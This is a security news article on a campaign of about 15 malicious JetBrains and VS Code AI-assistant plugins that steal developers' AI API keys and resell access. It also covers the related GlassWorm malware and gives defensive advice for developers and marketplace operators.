Developers utilizing AI-powered coding tools are facing a significant security threat due to a coordinated malware campaign targeting JetBrains and Visual Studio Code (VS Code) extensions. This campaign involves at least 15 fraudulent plugins designed to steal API keys from AI service providers such as OpenAI, Anthropic, and DeepSeek.
These malicious plugins masquerade as legitimate AI coding assistants, offering functionalities purportedly built on platforms like DeepSeek, OpenAI, and SiliconFlow. However, beneath their seemingly helpful interfaces, they execute credential-theft routines that compromise sensitive developer information.
The attack has been ongoing for approximately eight months, with the earliest instances detected in late October 2025 and new plugins appearing as recently as June 10, 2026. Collectively, these 15 plugins have amassed nearly 70,000 installations across seven vendor accounts, underscoring the extent to which developers trust marketplace ecosystems—a trust that has been exploited by these malicious actors.
Security researchers at Aikido Security were the first to identify and disclose this campaign. Their findings highlight that Integrated Development Environment (IDE) plugin ecosystems have become primary targets for AI credential theft. The lack of robust supply chain integrity controls within these environments has made them vulnerable to such attacks.
In addition to the JetBrains campaign, researchers have identified related threats active during the same period. The GlassWorm malware targeted the VS Code Marketplace and the OpenVSX Registry, while a separate supply chain compromise affected GitHub’s Internal Repository. These incidents reflect a broader trend of attackers focusing on developer tools as high-value entry points for malicious activities.
The financial implications of these attacks are substantial. AI inference services are costly, with enterprise customers paying significant monthly fees for model access. Stolen API keys allow attackers to utilize these services without incurring costs, leaving the legitimate owners to bear the expenses. This situation has led to the emergence of a black market for resold AI access.
All 15 identified malicious plugins share nearly identical codebases, repackaged and relisted under different names and vendor accounts. When developers input their API keys into the plugin settings and apply them, the credentials are stored locally as expected. However, simultaneously, these keys are transmitted via plain HTTP POST requests to attacker-controlled servers without any notification or consent from the user.
Further analysis by Aikido Security revealed a monetization strategy within this campaign that distinguishes it from typical credential theft. Some plugins offer paid tiers, and upon payment, the attacker’s server returns a working API key to the client. It is believed that these returned keys are likely stolen from users of the free-tier versions, effectively turning the campaign into a credential resale service where attackers profit both financially and through unauthorized AI compute access.
The GlassWorm malware, first identified by Koi Security in October 2025, exemplifies the technical sophistication of these threats. It spreads through malicious VS Code extensions on the OpenVSX Registry, utilizing techniques such as invisible Unicode characters to conceal malicious code. This method allows the malware to evade detection while compromising developer environments.
These incidents underscore the critical need for developers to exercise caution when installing IDE plugins. It is imperative to verify the authenticity of extensions, regularly audit installed plugins, and stay informed about emerging security threats. Additionally, marketplace operators must implement stricter security measures and supply chain integrity controls to prevent the distribution of malicious extensions and protect the developer community from such sophisticated attacks.
